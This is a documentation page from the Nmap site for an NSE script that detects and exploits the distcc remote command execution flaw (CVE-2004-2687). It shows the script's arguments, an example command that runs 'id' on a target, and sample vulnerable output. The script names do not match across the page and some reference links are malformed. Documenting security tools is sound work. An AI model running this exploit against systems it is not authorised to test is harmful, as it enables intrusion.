Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

Sponsors


File distcc-cve2004-2687

Script types: portrule
Categories: exploit, intrusive, vuln
Download: http://nmap.org/svn/scripts/distcc-cve2004-2687.nse

User Summary

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.

Script Arguments

cmd

the command to run at the remote server

vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Script Output

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-test:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|     Description:
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
|     References:
|       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
|       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|       http://http://www.osvdb.org/13378
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Requires


Author: Patrik Karlsson

License: Same as Nmap--See http://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault